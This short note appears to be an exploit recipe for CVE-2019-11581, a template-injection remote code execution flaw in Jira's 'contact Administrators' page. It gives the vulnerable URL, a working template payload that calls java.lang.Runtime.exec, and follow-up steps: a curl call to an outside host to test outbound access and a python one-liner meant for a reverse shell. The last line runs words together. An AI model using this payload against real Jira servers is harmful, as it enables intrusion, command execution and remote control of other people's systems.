RCE in Jira (CVE-2019–11581)
The "contact Admin" functionality is accessible on this URL:
https://jiraserver/secure/ContactAdministrators!default.jspa
The Subject field is vulnerable to Template-Injection (freemarker):
$i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec('cmd').waitFor()
For example, the command can be:
curl http://<ip>:<port>/to test if the server can make an HTTP request outsidepython -c ''to execute commands such as a reverse-shell